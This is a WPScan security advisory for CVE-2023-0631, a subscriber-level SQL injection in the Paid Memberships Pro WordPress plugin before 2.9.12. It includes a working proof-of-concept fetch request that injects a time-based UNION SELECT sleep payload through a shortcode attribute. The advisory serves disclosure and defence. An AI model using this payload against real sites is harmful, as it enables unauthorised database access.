WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Paid Memberships Pro < 2.9.12 - Subscriber+ SQL Injection

Description

The plugin does not prevent subscribers from rendering shortcodes that concatenate attributes directly into an SQL query.

Proof of Concept

While logged in as a subscriber, send the following request:

(await fetch('/wp-admin/admin-ajax.php',{method:'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'},body:'action=parse-media-shortcode&shortcode=[membership delay="Y" levels="(-1)) UNION SELECT sleep(10)-- ,L"]'})).text()

If successful, the request should hang for ~10 seconds, indicating we successfully injected something in the affected SQL query.

Affects Plugins

paid-memberships-pro
Fixed in version 2.9.12

References

CVE
CVE-2023-0631

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Marc Montpas

Submitter

Marc Montpas

Submitter website
https://wpscan.com
Submitter twitter
marcS0H
Verified

Yes

WPVDB ID
19ef92fd-b493-4488-91f0-e6ba51362f79

Timeline

Publicly Published

2023-02-27 (about 29 days ago)

Added

2023-02-27 (about 29 days ago)

Last Updated

2023-02-27 (about 29 days ago)

Our Other Services

WPScan WordPress Security Plugin